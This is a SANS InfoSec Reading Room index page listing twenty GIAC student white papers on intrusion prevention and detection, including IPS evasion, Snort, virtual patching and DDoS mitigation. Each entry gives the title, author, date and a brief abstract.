SANS InfoSec Reading Room - Intrusion Prevention

Most of the computer security white papers in the Reading Room have been written by students seeking GIAC certification to fulfill part of their certification requirements and are provided by SANS as a resource to benefit the security community at large. SANS attempts to ensure the accuracy of information, but papers are published "as is". Errors or inconsistencies may exist or may be introduced over time as material becomes dated. If you suspect a serious error, please contact webmaster@sans.org.

Featuring 20 papers as of May 21, 2013

Beating the IPS

By: Michael Dyrmose (posted on March 15, 2013)

Firewalls and Intrusion Prevention Systems (IPS) are core equipment in any enterprise or organization's network infrastructure.

Web Log Analysis and Defense with Mod_Rewrite

By: Rick Wanner (posted on March 15, 2013)

Anybody who has been tasked with defending a production web server has quickly realized that the volume of logs generated, often measuring in gigabytes or terabytes a day, defies analysis even with the use of a good event management solution.

An Analysis of the Snort Data Acquisition Modules

By: Christopher Murphy (posted on November 8, 2012)

Snort is an open-source Intrusion Detection System (IDS) that runs on Linux, UNIX, BSD variants and Windows.

Mitigating Browser Based Exploits through Behavior Based Defenses and Hardware Virtualization

By: Joseph Faust (posted on October 7, 2011)

There does not seem to be a day or week that goes by that one does not encounter a headline story about an organization being compromised and infiltrated by attackers.

Interception and Automating Blocking of Malicious Traffic Based on NDIS Intermediate Driver

By: Lee Ling Chuan (posted on June 30, 2011)

Over the past years, the number of malicious programs developed for illegal purpose has grown rapidly. The Monthly Malware Statistics, January 2011 (Zakorzhevsky, 2011) by Kaspersky Lab announced that there are over ten million viruses in circulation, most developed in January 2011.

Animal Farm: Protection From Client-side Attacks by Rendering Content With Python and Squid.

By: TJ OConnor (posted on February 22, 2011)

Client-side attacks target vulnerabilities in applications and continue to grow at a faster rate than operating system or server-side attacks (SANS, 2010). Server-side applications that reside behind several server-side controls, and hopefully, intrusion detection and prevention systems. In contrast, client-side attacks target the application on the end-user machine. End-user workstations typically have considerably less protection and intrusion detection mechanisms than the finer grain server-side applications, and they have proven to be an attractive target for attackers. As a result, client-side vulnerabilities have offset server-side vulnerabilities since 2005 (CORE, 2010).

Reducing Organizational Risk Through Virtual Patching

By: Joseph Faust (posted on January 11, 2011)

Software patching for IT Departments across the organizational landscape has always been an integral part of maintaining functional, usable and stable software. Historically the traditional patch cycle has been focused on fixing or resolving issues which affect functionality. In recent years, with the advancement of more sophisticated and targeted threats which are occurring in quicker cycles, this focus is dramatically changing. (Risk Assessment – Cisco, n.d.; Executive Office of The United States, 2005) . Corporations and Government now have a greater understanding of potential losses and expenses incurred by not maintaining application security and are moving towards an increased focus on patching and security (Epstein, Grow & Tschang, 2008). With organizations’ reputations, consumer confidence and corporate secrets at risk, corporations and government are recognizing the need to shift and address vulnerabilities at a much faster pace than they historically have done so (Chan, 2004). Over roughly the last ten years, the length of time between the documentation of a given vulnerability in a piece of software and the development of an actual exploit that can take advantage of the weakness in the application, has decreased tremendously. According to Andrew Jaquith, senior analyst at Yankee Group, the average time between vulnerability discovery and the release of exploit code is less than one week. (“Shrinking time from,” 2006). It has also been identified that “99% of intrusions result from exploitation of known vulnerabilities or configuration errors where countermeasures were available” ("Risk reduction and.," 2010) . Clearly these statistics alone can prove daunting for many businesses trying to keep pace and maintain proper defenses against the bad guys.

Detecting and Responding to Data Link Layer Attacks

By: TJ OConnor (posted on October 15, 2010)

In this paper, we examine techniques for identifying signatures and anomalies associated with attacks against the data link layer on both wired and wireless networks. Methods for signature-based detection and anomaly-based detection are not new. Intrusion detection systems such as SNORT are quite capable of detecting some of the known data link layer attacks and include a mechanism for integrating Intrusion Prevention System (IPS) solutions. This paper does not advocate against the use of these solutions in organizations. What we present can augment your existing capabilities by detecting attacks that may be blind to your IDS.

Smart IDS - Hybrid LaBrea Tarpit

By: Cristian Ruvalcaba (posted on December 28, 2009)

The importance of IDS in corporate defense is seen as an ever growing necessity. Major strides have been made for numerous IDS tools, but some have seen a stalemate. The next evolutionary step in IDS would involve the concept of a 'Smart Intrusion Detection System (IDS)', one that generates signatures. The question of how to generate these signatures becomes instrumental, and can involve a number of different components. In this case, it could involve a tool that uses a hybrid LaBrea concept.

A Multi-Perspective View of PHP Remote File Include Attacks

By: Dennis Schwarz (posted on November 10, 2009)

This paper describes the mechanics of a RFI (remote file include) attack by doing a code analysis and an attack walk through on a vulnerable application. Detecting an attack is discussed by writing sample IDS signatures and looking at related log files.

Efficiently Deducing IDS False Positives Using System Profiling

By: Michael Karwaski (posted on November 9, 2009)

Security Whitepaper: How to create a simple, static inventory database and compare security alerts to see if they relate to the host in question. This will allow for greater visibility into which alerts are actually relevant to the end users network.

Era of Spybots - A Secure Design Solution Using Intrusion Prevention Systems

By: Siva Kumar (posted on October 23, 2008)

This paper is presented in the form of a case study. It utilizes a fictitious company, GIAC Enterprises, a growing small retail company whose clients span the nation. In early spring GIACE was compromised with the Spybot worm which caused a business outage.

Intrusion Prevention with L7-Filter

By: Rui Santos (posted on August 19, 2008)

The possibility of using L7-filter as an Intrusion Prevention tool.

Intrusion Detection and Prevention In-sourced or Out-sourced

By: Vince Fitzparick (posted on July 30, 2008)

Host Intrusion Prevention Systems and Beyond

By: Jonathan Chee (posted on June 24, 2008)

Network IDS & IPS Deployment Strategies

By: Nicholas Pappas (posted on April 11, 2008)

Information systems are more capable today than ever before. Society increasingly relies on computing environments ranging from simple home networks, commonly attached to high speed Internet connections, to the largest enterprise networks spanning the entire globe. Filling one's tax return, shopping online, banking online, or even reading news headlines posted on the Internet are all so convenient. This increased reliance and convenience, coupled with the fact that attacks are concurrently becoming more prevalent has consequently elevated the need to have security controls in place to minimize risk as much as possible.

A Design for Building an IPS Using Open Source Products

By: Mike Smith (posted on October 30, 2006)

The goal of the research was to develop a design for an IPS that could be applied to any small to medium sized network.

Intrusion Detection on a Large Network

By: Jason Botwick (posted on April 8, 2004)

This paper will describe in detail the steps for setting up and managing an intrusion detection system across a large corporate network. It will begin with a discussion of the potential problems and benefits of the use of a NIDS on a large network.

Packet Level Normalisation

By: Ian Martin (posted on October 31, 2003)

This paper proposes that any Signature Based Passive Network Intrusion Detection (NID) deployment is incomplete without an 'In-line' 'Packet Level Normaliser' [1].

A Summary of DoS/DDoS Prevention, Monitoring and Mitigation Techniques in a Service Provider Environment

By: Michael Glenn (posted on September 26, 2003)

This paper covers Denial of Service (DoS) and Distributed Denial of Service attacks (DDoS) and discusses techniques to prevent attacks including good security policies, new/updated product security testing, patch management, spoofed packet dropping (uRPF) and firewall/IDS/IPS deployment in a service provider environment.